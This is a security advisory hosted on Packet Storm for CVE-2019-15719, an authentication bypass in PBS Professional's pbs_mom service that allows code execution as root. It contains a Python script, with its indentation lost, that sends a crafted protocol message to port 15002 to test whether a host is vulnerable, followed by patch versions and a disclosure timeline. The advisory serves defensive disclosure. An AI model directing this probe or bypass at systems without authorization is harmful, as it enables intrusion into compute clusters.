exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PBS Professional 19.2.3 Authentication Bypass

PBS Professional 19.2.3 Authentication Bypass
Posted Oct 9, 2019
Authored by John Fitzpatrick

PBS Professional versions 19.2.3 and below suffer from an authentication bypass vulnerability.

tags | exploit, bypass
advisories | CVE-2019-15719
SHA-256 | 4e778bfddd48fd678b80e1ee642c5e78739451b4e2a52e2e2396245a985f8e41

PBS Professional 19.2.3 Authentication Bypass

Change Mirror Download
===========================================================
PBS Professional MoM Authentication Bypass (CVE-2019-15719)
===========================================================

* Software: PBS Professional
* Affected Versions: All versions up to and including 19.2.3
* Vendor: Altair Engineering, Inc
* CVE Reference: CVE-2019-15719
* Severity: CVSS 9.0 [CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H]
* Author: John Fitzpatrick
* Date: 2019-10-08


Description
===========

HPCsec have identified a vulnerability in PBS Pro which allows for arbitrary code execution on any node running the pbs_mom service. This vulnerability can be exploited by anyone in a position to communicate with the pbs_mom service from an authorized node within the cluster. Exploitation of this issue allows for arbitrary code execution as any other user including as root, even in installations where root is not permitted to submit jobs.

This issue arises as a result of the pbs_mom service failing to apply a necessary security check before handling instructions sent to it.

By default the pbs_mom service runs on TCP port 15002. The following code can be run to check whether a mom is vulnerable to this issue:

---BEGIN CODE::python---

import socket
import sys

if len(sys.argv) < 2:
print "ERROR: Please specify the address of pbs_mom"
sys.exit(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
s.connect((sys.argv[1], 15002))
s.send("+2+1+1+1x+1x+1x2+222+15+1x+0+1x+02+24+1x+01+1x+02+12+1x+0+1x+02+14+1x+0+1x+02+"+
"131+1x+0+1x+02+411+1x+01+1x+02+241+1x+01+1x+02+261+1x+01+1x+02+12+1x+0+1x+02+1"+
"31+1x+0+1x+02+421+1x+01+1x+02+221+1x+1+1x+112+102+251+1x+1+1x+1x2+102+221+1x+0"+
"+1x2+103+3351+1x+01+1x+02+13+1x+0+1x+02+14+1x+0+1x2+102+19+1x+0+1x+02+12+1x+0+"+
"11+02+181+1x+0+210+02+29+6hpcsec+01+1x+02+141+1x+0+11+0+0")
response = s.recv(64)

if "Invalid" in response:
print "Vulnerable = NO"
elif "Access" in response:
print "Vulnerable = UNKNOWN (try again from a permitted host, e.g. another mom or the pbs server)"
elif "Undefined" or "System" in response:
print "Vulnerable = YES"
else:
print "Vulnerable = UNKNOWN (unhandled response)"
except Exception, e:
print "ERROR: "+str(e)

# Download here: https://files.hpcsec.com/utilities/check-CVE-2019-15719.py

---END CODE---


Solution
========

A fix for this issue has been incorporated into all currently supported versions of PBS Professional. Fixes are available in the following versions:

* 13.0.412
* 14.2.7
* 18.2.5
* 19.2.4 and newer

A fix is now available on GitHub for users of the open source 19.1.X branch. The fix is incorporated into the current 19.1.2 release with no change to the version number. Therefore earlier instances of 19.1.2 are vulnerable.

Those running earlier versions should update to the latest fixed version in the relevant branch.

The updated versions are available from the Altair PBS Professional download site (https://www.pbspro.org/Download.aspx#download).


Timeline
========

2019-08-22: Issue reported to Altair
2019-10-07: Patch available for all supported versions of PBS Pro
2019-10-08: HPCsec advisory published

================================================
https://www.hpcsec.com/2019/10/08/cve-2019-15719
================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close